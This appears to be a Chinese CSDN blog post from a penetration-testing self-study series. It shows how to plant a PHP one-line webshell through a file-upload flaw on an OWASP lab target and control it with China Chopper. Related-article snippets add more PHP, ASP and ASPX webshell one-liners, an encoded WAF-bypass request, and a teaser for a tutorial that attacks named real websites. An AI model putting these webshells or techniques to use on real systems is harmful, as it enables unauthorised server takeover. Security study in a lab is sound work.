自学渗透第四天--中国菜刀

最新推荐文章于 2024-10-27 16:01:08 发布
最新推荐文章于 2024-10-27 16:01:08 发布
阅读量1.5k 收藏 6
点赞数 3
CC 4.0 BY-SA版权
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43710367/article/details/106064526

自学渗透第四天–中国菜刀

一、如何使用
中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。
(1)首先将一句话木马上传至网站后台。
在这里插入图片描述
(2)运行该文件,确认文件上传成功。
在这里插入图片描述
(3)复制该链接到中国菜刀,并输入相应的密码。
在这里插入图片描述
(4)成功获取网站shell。
在这里插入图片描述

二、常用功能
1、上传本地文件到网站后台。
在这里插入图片描述

最低0.47元/天 解锁文章
网安工具系列:WebShell --中国菜,管站之
weixin_54626591的博客
03-29 1356
WebShell --中国菜,管站之
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
菜刀渗透
刘思成的博客
03-27 2626
快速搭建discuz论坛 使用kali下BurpSuite对discuz后台注入php木马 使用Cknife“菜刀”.上传webshell木马到网站 使用Webshell查看mysql数据库密码并盗取数据库 快速搭建discuz论坛 攻击思路 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本,找漏洞 2、拿到对A有一定权限的身份,如果对方是一个WEB服务器,就利用...
上传渗透----中国菜和kali的使用安全攻防)
baidu_38803985的博客
04-09 5462
1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2 下载地址 我们还需要中国菜和kali这两个工具 实验原理 1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕...
中国菜
qq_2411772106的博客
06-22 1437
中国菜工具是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜来进行管理 一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");
渗透测试中菜刀的应用(webshell)
最新发布
2301_80460220的博客
10-27 663
顾名思义,“web”的含义是显然。
fv 06php2c,渗透-简单制作过waf的中国菜
weixin_39926540的博客
03-11 255
0x01简单分析web渗透中很常见的情况,用菜刀连接免杀的一句话木马连不上,有waf 除了变形一句话木马为免杀一句话,我们还需要来制作过waf的菜刀进行连接、这里用的一句话为来看看菜刀连接一句话的时候的包 x=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3J...
《RabbitMQ系列教程-第四章-04-RabbitMQ工作模式之Routing路由模式》_rabbitmq fanout routingkey
2401_84302583的博客
04-28 349
刚刚我们说的Pub/Sub订阅模式中介绍了ExchangeExchange有四种类型(directtopicheadersfanout),Pub/Sub订阅强调的是Fanout类型的Exchange,Routing模式则强调的是Exchange的direct模式,Routing模式也叫直连模式;Routing模式官网介绍:https://www.rabbitmq.com/tutorials/tutorial-four-java.html。
第二章-数据传输安全
2401_84301389的博客
04-29 821
是一组基于网络层的,应用密码学的安全通信协议族。IPSec不是具体指哪个协议,而是一个开放的协议族。IPSec协议的设计目标:保证IP层之上的数据安全IPSec VPN:是基于IPSec协议族构建的在IP层实现的安全虚拟专用网。通过在数据包中插入一个预定义头部的方式,来保障OSI上层协议数据安全,主要用于保护TCP、UDP、ICMP和隧道的IP数据包。
《分布式事务系列教程-第一章-什么是分布式事务》_分布式事务教程
2401_84302655的博客
04-28 759
数据是存储在同一个数据库,但是由于系统不同,下订单微服务下单的时候,会新创建一个连接(Connection),那么此时远程调用库存微服务的时候,也会开启一个新的Connection,不同的Connection都有。,数据存储在不同的数据库,业务也存在不同的系统中,当订单微服务下订单时会有新的Connection,与此同时调用远端的库存微服务减库存时,库存微服务必然会创建一个新的Connection用于减库存操作,因此。③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
渗透教程渗透教程
08-18
今天我们还是讲渗透、 只不过用到的工具不同 御剑孤独1.5+明小子 我是傻瓜先生 自从上次做了个 菜刀 +椰树的教程 我的站就被两个孙子给黑了 我实在看不下去。 我放出教程是为了让你们学习。你们却来搞我。 不多说了 教程开始 OK。还是一样 随便找个网站 http://www.zztiancaiedu.com/ http://news.jiaotou.org/ http://gz.ewangpai.com/ 就上次的这些站 需要等待一下 这里需要点时间我就暂停一下 OK,扫描好了 竟然没猜到 换一个 好吧再换一个 这里我们需要 MD5解密 OK。进后台了 可以邪恶了。 会的 可以传小马 代替数据库然后穿大马。 我这里就不详细讲解了。 欢迎各位来和我交流讨论 也希望有大牛来啊
渗透工具环境篇——Cknife中国菜使用
Litbai_zhang
10-09 2万+
提要 在学习上传漏洞的时候研究到了Cknife这个软件。下面来介绍一下菜刀使用方法。 使用 1.下载菜刀,打开Cknife.jar软件 2.右键点击添加 3.输入上传的php文件,php文件密码,脚本类型选择PHP,字符编码GB2312,点击添加 4.右键文件管理 成功 ...
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
qq_53058639的博客
03-17 2211
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。?
【BugKu-CTF论坛writeup(杂项)】中国菜
preserphy的博客
03-05 950
hehe,提示是国产神器。.pcapng文件???不管,先binwalk一下。果然有猫腻,提取flag拿到了但是回头再看那个“国产神器”的提示,很茫然……
bugku---中国菜
LuckySec
12-06 1629
题目 有一个可以下载的zip文件 下载打开 使用Wireshark.exe 进行分析 发现里面有flag文件,使用binwalk进行查看 发现一个zip文件,选择该文件进行分离 得到分离出的文件 继续解压缩得到flag.txt文件 打开flag.txt GET! ...
中国菜使用与原理分析
weixin_45597678的博客
12-04 2万+
中国菜的功能 中国菜使用 原理分析
WebShell --中国菜,管站之
热门推荐
Kevin's Blog
08-03 3万+
文章目录一、介绍二、下载查毒2.1 下载2.2 查毒三、使用 声明: 任何一款工具都具有两面性,用好则相安无事、非之则遗恨终生! 本文仅供学习,请勿于非授权状态下用于非法用途! 一、介绍   一款专业的网站管理软件(WebShell管理工具),小巧强大,只要支持动态脚本的网站都可以用中国菜进行管理。 二、下载查毒 2.1 下载 原官网已不再提供下载:可以去github进行下载: https...
kali渗透测试-WebShell(中国菜、WeBaCoo、Weevely)
网络安全领域优质创作者
11-21 2238
本质 : 上传一句话木马 <?php echo shell_exec($_GET[‘cmd‘]);?> windows平台 中国菜 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> p...
linux curl命令
04-01
curl命令是一个用于传输数据的工具,可以通过命令行方式发送和接收数据。它支持多种协议和通信方式,包括HTTP、FTP、SMTP等。 常用curl命令参数: 1. -X:指定HTTP方法,如GET、POST、PUT等; 2. -H:指定HTTP请求头; 3. -d:指定HTTP POST请求的数据; 4. -o:指定输出文件名; 5. -s:静默模式,不显示进度信息; 6. -v:显示HTTP请求和响应的详细信息; 7. -u:指定用户名和密码; 8. -k:允许不验证SSL证书; 9. -L:自动跟随重定向; 10. -I:只获取HTTP响应头。 示例: 1. 发送GET请求:curl http://www.example.com 2. 发送POST请求:curl -X POST -d "username=admin&password=123456" http://www.example.com/login 3. 下载文件:curl -o example.zip http://www.example.com/example.zip 4. 不验证SSL证书:curl -k https://www.example.com 5. 显示HTTP请求和响应的详细信息:curl -v http://www.example.com 6. 获取HTTP响应头:curl -I http://www.example.com
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值